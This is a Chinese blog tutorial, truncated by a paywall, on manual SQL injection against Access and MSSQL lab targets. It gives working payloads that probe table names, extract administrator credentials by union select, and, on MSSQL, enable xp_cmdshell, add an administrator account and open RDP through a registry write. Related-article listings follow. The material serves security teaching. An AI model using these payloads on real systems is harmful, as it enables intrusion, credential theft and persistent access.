18-OWASP top10--SQL注入(三、MSSQL、Mysql手工注入及Sqlmap工具使用)

原创 已于 2024-06-22 19:36:15 修改 · 1.8k 阅读 · 17
标签
#数据库 #sql #网络安全 #服务器 #mysql
#安全 #mssql
于 2024-05-27 20:43:51 首次发布

目录

access数据库

手工注入过程:

猜解数据库表名

猜解数据库表名里面的字段

猜解字段内容

SQL注入中的高级查询

mssql数据库

手工注入过程:

sa权限

 ​编辑dbowner权限

public权限

mysql数据库

1、对服务器文件进行读写操作(前提条件)

需要知道远程Web目录

 secure_file_priv为空:

服务器读取文件

写webshell获取权限

 2、mysq数据库手工注入过程:

检查注入点

查字段

查看当前数据库用户名及版本

获取dvwa表名

获取所有user表里面的字段

获取所有字段内容;0x7c表示|符号 

 注入防御

1、涵数过滤

2、直接下载相关防范注入文件,通过incloud包含放在网站配置文件里面

3、PDO预处理

access数据库

手工注入过程:
猜解数据库表名
​​​​​​​and exists(select * from users)


--如http://10.0.0.101/custom.asp?id=1 and exists(select * from users) 
--此查询尝试验证id参数是否可被用来注入SQL代码,并进一步判断数据库中是否有名为users的表。如果网页返回正常或特定的错误信息,可能表明SQL注入漏洞存在。
--如果网站直接显示一个错误页面,特别是提及SQL语法错误或表名users的信息,强烈暗示存在SQL注入漏洞。
--利用bp抓包进行数据库表名爆破(流程如下图)

加载网站用bp抓包

http://10.0.0.101/custom.asp?id=1 and exists(select * from users)

 添加字典跑数据库表名

返回200状态,正常显示证明数据库有此表  

猜解数据库表名里面的字段
and exists(select password from administrator)

 结果:

猜解字段内容
and (select top 1 len(user_name) from administrator)>1
and (select top 1 asc(mid(user_name,1,1)) from administrator)>0
SQL注入中的高级查询
order by       
--order by 8    order by 7
union select   
--http://10.0.0.101/news_view.asp?id=14 union select 1,2,3,4,5,6,7 from administrator
 order by 8

order by 7  

union select 1,2,3,4,5,6,7 from administrator

显示2 ,3,5,7;说明2,3,5,7可执行可读写

说明:
替换的内容
2:user_name   --输出admin
3:password     --输出21232f297a57a5a743894a0e4a801fc3
5:id                 --输出1
7:now             --输出2024-5-3 18:22:54

union select 1,user_name,password,4,id,6,now from administrator  

  • 偏移注入

  • 跨库查询

mssql数据库

手工注入过程:
sa权限

http://10.0.0.101:84/sqlserver/1.aspx?xxser=1

 --1.aspx则是一个具体的ASP.NET页面文件
http://10.0.0.101:84/sqlserver/1.aspx?xxser=1'

--测试是否有注入点
http://10.0.0.101:84/sqlserver/1.aspx?xxser=1 and exists (select * from%20sysobjects) 
--注入尝试:?xxser=1 and exists (select * from%20sysobjects) 部分是在原有查询参数xxser的值后面添加了SQL代码,试图探测数据库中是否存在特定的对象。这里使用了exists子句和sysobjects表。sysobjects是SQL Server中的一个系统表,包含了数据库中所有对象(如表、视图、存储过程等)的信息。通过检查sysobjects表中的记录是否存在,攻击者可以间接判断SQL注入是否成功以及数据库中是否有特定的表或对象。
http://10.0.0.101:84/sqlserver/1.aspx?xxser=1 and system_user=0 
--查询当前数据库系统的用户名
http://10.0.0.101:84/sqlserver/1.aspx?xxser=1 and 1=(select IS_SRVROLEMEMBER('sysadmin')) 
--检查注入点是否为sa权限
http://10.0.0.101:84/sqlserver/1.aspx?xxser=1 and 1=(select count(*) from master.dbo.sysobjects where name ='xp_cmdshell')  
--判断一下xp_cmdshell存储过程是否存在
http://10.0.0.101:84/sqlserver/1.aspx?xxser=1;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
--恢复(启用)SQL Server中的xp_cmdshell扩展存储过程的正确方法
http://10.0.0.101:84/sqlserver/1.aspx?xxser=1;exec master..xp_cmdshell 'net user test test /add'
http://10.0.0.101:84/sqlserver/1.aspx?xxser=1;exec master..xp_cmdshell 'net localgroup administrators test /add'
--添加账户
http://10.0.0.101:84/sqlserver/1.aspx?xxser=1;exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;
--开启3389端口
远程连接10.0.0.101主机输入账户test密码test登陆;建立远程连接。

检查是否是mssql数据库:未报错,是mssql数据库

and exists (select * from sysobjects)

第二步:查询当前数据库系统的用户名

and system_user=0

 

第三步:检查注入点是否为sa权限:存在

and 1=(select IS_SRVROLEMEMBER('sysadmin'))

第四步:判断一下xp_cmdshell存储过程是否存在

and 1=(select count(*) from master.dbo.sysobjects where name ='xp_cmdshell')

恢复xp_cmdshell

最低0.47元/天 解锁文章
GetWebShell增强版.rar
04-11
用于MSSQL差异备份 功能强大 ... 不解释
mysql 导出dmp文件_15款优秀的mysql管理工具与应用程序推荐
weixin_39610722的博客
11-04 990
对于开发人员来说,mysql管理工具可以说是必不可缺的,它能帮助开发人员在许多方面支持包括PostgreSQLMySQL、Redis、MongoDB等在内的多种数据库;同时还能提供包括触发器、事件、视图、数据备份、对象结构等多种功能。本文帮大家整理了15款优秀的MySQL管理工具和应用软件,大家可以从中选择一个,从而帮助你轻松快速完成工作。1. InductionInduction是一款用于理解...
MSSQL远程连接(Microsoft SQL Server)
Luck_SHLiang的博客
08-20 2532
a.在微软自己的管理工具中,登录界面的服务器名称栏,如果已经知道服务器的设备名称,可以直接填写。不知道的话,可以点击浏览更多,在网络服务器上搜索,可以得到局域网内拥有的SQL服务器的其他的机器的设备名。正常的服务器系统,过程应该类似吧,目前作者也没有用过真正的服务器。至此所有相关软件的设置配置都结束了,如果在所有配置都完成的情况下,在远程连接过程中,出现问题。(1)首先看一下服务器MSSQL数据库属性,连接选项,正常情况下,软件是默认打开【允许远程连接到此服务器】功能的。a.微软自己的SSMS;
SQL Server手工注入方式
渗透之路,攻防之间皆学问
01-04 7727
本文详细的介绍了Sql Server安全基础,包括环境搭建,T-sql语法,sqlserver用户权限,以及sqlserver注入的方法和提权方式。 Microsoft SQL Server(微软结构化查询语言服务器),也叫Mssql,是由美国微软公司所推出的关系型数据库。默认端口号为1433常见版本如下版本年份发布名称8.02000年8.02003年SQL Server 2000 64-bit版本9.02005年10.02008年10.252009年SQL Azure。
navicat,myeclipse,idea远程连接SQL Server数据库方法
相关项目可以查看https://gitee.com/fan-pl或https://github.com/fpl1116
08-28 5245
演示工具环境:Navicat16,Myeclipse2017,IDEA2023 和 SQL Server2022
MSSQL手工注入
qq_65852138的博客
08-20 1155
MSSQL手工注入
18-OWASP top10--SQL注入实战:从手工注入到自动化工具MSSQLMySQLSqlmap深度解析)
y4z5a6b7的博客
03-07 565
本文深入解析了SQL注入攻击的原理与实战方法,涵盖从手工注入到自动化工具Sqlmap的完整流程。文章详细介绍了针对MSSQLMySQL数据库的侦察、信息收集、权限提升等核心攻击技术,并强调了其在OWASP Top 10中的高危地位。同时,文章也提供了使用参数化查询、最小权限原则等关键防御策略,帮助开发者与安全人员从根本上防范此类经典漏洞。
网络安全实训Day17and18
Yisitelz的博客
04-26 1330
SQL注入攻击,盲注,sqlmap
Web渗透测试底层逻辑:从信息收集到内网横向移动的完整实战指南
最新发布
weixin_34204722的博客
06-17 350
Web渗透测试作为网络安全领域的核心技术,其本质是模拟攻击者对Web应用进行授权安全评估的过程。其核心原理在于通过系统化的方法识别和利用系统漏洞,以验证安全防护的有效性。这项技术的价值在于帮助企业发现潜在安全风险,提升整体安全防护水平,广泛应用于金融、电商、政务等各类在线业务系统的安全评估。在实战中,信息收集是渗透测试的基石,它决定了攻击面的广度与深度;而内网横向移动则是获取核心资产权限的关键阶段。本文将以SQL注入、权限提升等经典漏洞为例,深入剖析Web渗透的底层逻辑与实战技巧,帮助安全从业者构建从外网突
网络安全就业有什么要求?可算来了,给大家了解一下网络安全就业篇学习大纲
kjuhfkicf154的博客
06-27 899
网络安全工程师就业指南 本文介绍了网络安全工程师的工作职责和必备技能。随着信息化发展,网络安全事件频发,网络安全工程师需要掌握操作系统基础(Unix/Linux/Windows)、网络基础(协议/模型/传输介质)、Web应用开发(HTML/CSS/PHP等)以及渗透测试技术(SQL注入/XSS攻击/漏洞扫描等)。文章还提供了详细的课程大纲,涵盖从基础理论到实战渗透测试的全方位内容,为想从事网络安全行业的人员提供了系统化的学习路径。掌握这些技术要点是成为合格网络安全工程师的关键。
SQLDBX如何连接CACHE!!!
weixin_43893935的博客
09-03 3459
如何登录SQlDbx工具bai 首先输入对应的数据du库连接类型,此处zhi最为常用的包含 MS SQLServer,Access数据库MYSQL数据库,Oracel数据库等,这里我们讲解连dao接微软的数据库MS SQLServer (1)DBMS类型:MSSQLServer (2)Server 服务器地址:127.0.0.1(本机),如果是其他电脑请输入对应的计算机名称或者数据库实例,比如192.168.1.180等等 (3)DataBase:这里可以填写也可以不填写,等登陆后再选择数据库 (4)用户
【亲测免费】 QuickSQL:轻量级MSSQL连接与查询工具
gitblog_00289的博客
04-03 749
QuickSQL:轻量级MSSQL连接与查询工具 项目介绍 在数据库管理和渗透测试等领域,需要一个简单、高效的工具来连接和查询MSSQL数据库。QuickSQL 正是这样一款工具,它是一款轻量级的MSSQL连接和查询工具,无需管理员权限即可运行。QuickSQL 的设计初衷是为了在受限的权限下,仍能够执行必要的SQL查询操作,例如在渗透测试过程中,当获取到一个普通用户权限的账号时,依然能够利用该账...
mssql连接工具_开源免费的数据库管理工具 DBeaver 介绍
weixin_39687301的博客
12-03 3077
DBeaver是一个通用的数据库管理工具SQL 客户端,支持 MySQL, PostgreSQL, Oracle, DB2, MSSQL, Sybase, Mimer, HSQLDB, Derby, 以及其他兼容 JDBC 的数据库。重要的是它开源免费,而且使用起来也很方便,功能对于开发来说足够用了。笔者之前链接PostgreSQL数据库一直用的PGAdmin后来发现DBeaver后就转用DB...
#OWASP TOP 10#渗透测试#网络安全# 一文搞懂什么是SQL注入!!!
soc的博客
01-18 732
SQL注入是一种非常常见的数据库攻击手段,它利用了SQL数据库操作通过SQL语句执行的特点。攻击者通过在表单中填写包含SQL关键字的数据,使得数据库执行非常规代码,从而达到攻击的目的。
MSSQL注入手工注入mssql提权
代码审计
04-18 2424
mssql数据库 mssql数据库相比mysql数据库本质上的框架是差不多的,使用的增,删,改,查命令是互相通的,mysql使用的函数在mssql中有些会起不到作用点。 MSSQL数据库的基本知识 MSSQL中自带数据库信息 库名 相关功能 master 系统控制数据库,包含配置信息,用户登录信息,系统运行状态 model 模板数据库数据库时建立所有数据库的模板。 tempdb 临时容器,保存所有的临时表,存储过程和其他程序交互的临时文件 msdb 主要为用户使用,记录着计划
反渗透,sql注入漏洞扫描工具
fengbin2005的专栏
09-15 1229
程序漏洞扫描 xss漏洞查找
CTF3之web安全SQL注入
weixin_52132147的博客
08-13 412
只要是用户可以输入的位置都是有可能存在注入点的;漏洞扫描器的扫描结果也不一定完全正确。
owasp zap 暴力破解
jklbnm12的博客
11-27 1003
网络安全里装着好多人的侠客梦。但是不能触碰铁律,所以,只小小的自娱自乐。 自己练习,大都会用到DVWA,一个很好的安全测试平台,自己搭建(很简单,傻瓜式搭建),自己设置安全级别,自己验证各种漏洞攻击方式。(这里不再赘述,有时间可以将DVWA 的搭建再细传上来) 1、代理设置 将owasp zap 的本地代理设置成127.0.0.1 端口8080 测试用的浏览器也设置成同样的代理(可以用proxy switcher等快捷代理设置插件,也可以自己手动设置,例如如下) ① 2000多本网络安全系列电子书 ② 网
Mysql手工注入流程(有回显)
wyzhxhn的博客
11-05 459
sql注入
MySQL数据库的多种连接方式及工具
热门推荐
君莫笑的博客
10-31 8万+
面板中,左上部分列出了已经建立的数据库连接,点击各项,右侧会展示当前连接的配置信息,General面板中,可以配置数据库连接的信息,如主机、用户名、密码等,不同数据库配置信息不完全相同,填入数据库URL,注意,URL后有个选项,可以选择直接填入url,那么就不需要单独填主机名、端口等信息了。首先要打开服务,先点击启动VNMP,然后再点击启动套件中的Apache和Mysql,FTP看情况,Nginx服务和Apache是一类型的,个人的话推荐Apache,二选一,具体区别自己百度。(密码在安装过程中设定的)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

XLbb:

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值